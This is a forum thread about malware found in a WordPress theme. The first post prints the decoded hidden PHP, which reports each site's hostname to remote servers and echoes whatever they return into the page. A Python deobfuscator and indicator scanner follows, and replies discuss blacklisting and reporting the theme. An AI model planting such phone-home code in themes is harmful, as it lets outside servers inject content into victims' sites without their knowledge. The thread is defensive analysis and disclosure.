Malware in themes (5 posts)

  1. iandoug
    Member
    Posted 5 years ago #

    Hi

    So I'm testing a new theme for a client. "Surf Passion".
    Theme loads slow.

    Accidentally discovered nasty stuff in the footer.php, and even more in functions.php.

    The nasty stuff is gzinflated/rot13/base64-encoded php code.

    The footer has this:

    error_reporting(0);
    // Builds a URL that sends this site's hostname and the requested page to a remote server
    $CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);

    // Fetches whatever that server returns and prints it straight into the page,
    // trying file_get_contents(), then file(), then cURL
    if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) {
        echo @file_get_contents($CodeURL);
    } elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) {
        $content = @file($CodeURL);
        echo @join("", $content);
    } elseif (function_exists("curl_init")) {
        $ch = curl_init($CodeURL);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_exec($ch);
        curl_close($ch);
    }

    which appears to stick invisible links into footers, presumably to get some pagerank.

    functions.php requires 40 levels of decryption to produce this:

    <?php

    if ( function_exists('register_sidebars') )
        register_sidebars(2,array(
            'before_widget' => '',
            'after_widget' => '',
            'before_title' => '<h2>',
            'after_title' => '</h2>',
        ));

    function wp_lk()
    {
        // Reports this site's hostname to www.project-theme.com, then fetches
        // a per-hostname text file from the same server and prints it
        $loc = urlencode($_SERVER['HTTP_HOST']);
        $lname = "www.project-theme.com";
        $file="pages/$loc.txt";
        $carnivore="/wp_stat.php?loc=$loc";

        // Note: the middle clause ($test="") is an assignment, not a comparison
        $test=ini_get('allow_url_fopen');
        if ($test==0 || $test="" || $test=="off")
        {
            // Phone home over a raw socket when URL wrappers are disabled
            $fps = @fsockopen($lname, 80, $errno, $errstr, 30);
            if($fps)
            {
                $out = "POST $carnivore HTTP/1.1\r\n";
                $out .= "Host: $lname\r\n";
                $out .= "Connection: Close\r\n\r\n";
                @fwrite($fps, $out);
                @fclose($fps);
            }
        }
        else
        {
            // Phone home via a plain HTTP GET
            @file_get_contents("http://" .$lname .$carnivore);
        }

        if ($test==0 || $test="" || $test=="off")
        {
            $code = @file_get_contents("http://" .$lname ."/" .$file);
        }
        else
        {
            // Fetch the per-hostname file by hand over a socket
            $fp = @fsockopen($lname, '80', $err_no, $err_str, 30);
            if ($fp)
            {
                @stream_set_timeout($fp, 60);

                @fwrite($fp, "GET /$file HTTP/1.1\r\n");
                @fwrite($fp, "Host: $lname\r\n");
                @fwrite($fp, "Connection: Close\r\n\r\n");

                $code = "";

                while(!feof($fp))
                {
                    $code .= @fgets($fp, 1024);
                }

                // Strip the HTTP headers, keep the body
                $code = trim(strstr($code, "\r\n\r\n"));
            }

            @fclose($fp);
        }

        // Whatever came back is printed into the page
        if ( is_string($code) )
            echo($code);
    }

    ?>

    I can't find any calls to wp_lk() in the code, maybe it's hidden somewhere...

    Questions:

    1. Does anyone know what the code in functions.php does?

    2. is there a place where users can identify themes as containing malware, so that they are blacklisted?

    thanks, Ian
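The two snippets above show the pattern worth scanning for: layered eval(gzinflate(str_rot13(base64_decode(...)))) wrappers, plus code that silences errors, sends the site's hostname to a remote server, and echoes whatever comes back. The following is an added example, not code from the thread or from any theme, written from the defender's side: it statically peels the decode layers in Python without ever running the PHP, and flags the remote-fetch indicators. The decoder set, the regexes, the indicator names, and the sample inputs (including the placeholder host remote.example.invalid) are all assumptions made for this example.

```python
import base64
import re
import zlib

# One obfuscation wrapper of the kind the thread describes:
#   eval(gzinflate(str_rot13(base64_decode('...'))));
# Group 1 is the chain of decoder calls (outermost first), group 2 the quoted blob.
WRAPPER_RE = re.compile(
    r"eval\s*\(\s*((?:(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(\s*)+)"
    r"['\"]([A-Za-z0-9+/=\s]*)['\"]\s*\)+\s*;?",
    re.DOTALL,
)

_ROT13 = bytes.maketrans(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    b"NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm",
)

# Python equivalents of the PHP decoders; nothing here executes the decoded PHP.
DECODERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": lambda d: d.translate(_ROT13),                   # byte-wise, like PHP
    "gzinflate": lambda d: zlib.decompress(d, -zlib.MAX_WBITS),  # raw DEFLATE
    "gzuncompress": zlib.decompress,                              # zlib-wrapped
}


def peel_layers(php_source, max_layers=100):
    """Statically unwrap nested eval(decode(...)) layers.

    Returns (final_source, layer_count). Stops when no wrapper is left, when a
    layer fails to decode (corrupt or truncated blob), or at max_layers.
    """
    current, layers = php_source, 0
    while layers < max_layers:
        m = WRAPPER_RE.search(current)
        if not m:
            break
        chain = re.findall(r"[a-z0-9_]+", m.group(1))
        data = re.sub(r"\s+", "", m.group(2)).encode("ascii")
        try:
            for fn in reversed(chain):      # innermost decoder runs first
                data = DECODERS[fn](data)
        except (ValueError, zlib.error):    # binascii.Error is a ValueError
            break
        # The decoded string is what eval() would have run; it is the next input.
        current = data.decode("utf-8", errors="replace")
        layers += 1
    return current, layers


# Static indicators drawn from the two snippets in the thread (assumed names).
INDICATORS = {
    "nested-eval-decode": WRAPPER_RE,
    "errors-silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "remote-content-echoed": re.compile(
        r"echo\s*@?\s*(?:file_get_contents|join|implode)\s*\(|curl_exec\s*\("),
    "hostname-sent-remotely": re.compile(
        r"urlencode\s*\(\s*\$_SERVER\s*\[\s*['\"]HTTP_HOST['\"]\s*\]\s*\)"),
    "raw-socket-http": re.compile(r"fsockopen\s*\("),
}


def suspicious_indicators(php_source):
    """Names of the indicators present in a theme file; an empty list means none fired."""
    return [name for name, rx in INDICATORS.items() if rx.search(php_source)]


def _deflate(data):
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return c.compress(data) + c.flush()


def build_sample(payload, layers):
    """Constructed test input: wrap payload in deflate -> rot13 -> base64, `layers` times."""
    src = payload
    for _ in range(layers):
        blob = base64.b64encode(_deflate(src.encode()).translate(_ROT13)).decode()
        src = "<?php eval(gzinflate(str_rot13(base64_decode('%s')))); ?>" % blob
    return src


# Constructed footer in the shape of the thread's first snippet, with a placeholder host.
FOOTER_SAMPLE = '''<?php
error_reporting(0);
$CodeURL = "http://remote.example.invalid/content.php?host=".urlencode($_SERVER["HTTP_HOST"]);
if (intval(ini_get("allow_url_fopen")) && function_exists("file_get_contents")) {
    echo @file_get_contents($CodeURL);
} elseif (function_exists("curl_init")) {
    $ch = curl_init($CodeURL);
    curl_exec($ch);
}
?>'''

if __name__ == "__main__":
    sample = build_sample('<?php echo "hello"; ?>', 40)   # 40 layers, as in the thread
    print(peel_layers(sample))
    print(suspicious_indicators(sample))
    print(suspicious_indicators(FOOTER_SAMPLE))
```

Peeling is done entirely in Python, so a theme file can be inspected without giving its payload a chance to run; in practice the decoded output is the thing to read, and the indicator list is a cheap first pass over every PHP file in a theme directory.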

  2. Samuel B
    moderator
    Posted 5 years ago #

    Personally, I think we should have a section dealing with these types of themes. Any time someone finds obfuscated code in a theme - list it here and warn people to beware of it.
    Maybe authors would get tired of seeing their crappy themes listed here and stop making them.
    My .02

    note - most of these themes are done this way to simply get google juice but could easily hide some nasties

  3. chaoskaizer
    Member
    Posted 5 years ago #

    2. You could try submitting the offending website at http://badwarebusters.org/main/ask (safe browsing network).

  4. whooami
    Member
    Posted 5 years ago #

    that looks like it phones home to here..

    http://www.project-theme.com/wp_stat.php?loc=my-house-asshole

    it also grabs a file ..

    interested in knowing how many domains this crap has run?

    http://www.project-theme.com/pages/

  5. whooami
    Member
    Posted 5 years ago #

    What's interesting is that this could be reversed. I would never support any kind of denial of service attacks, but I suppose anything is possible.

    I ran this from the command line, it outputs a page very similar to the front of that site. I didn't look especially close but it's either it, or very very close.

Topic Closed

This topic has been closed to new replies.
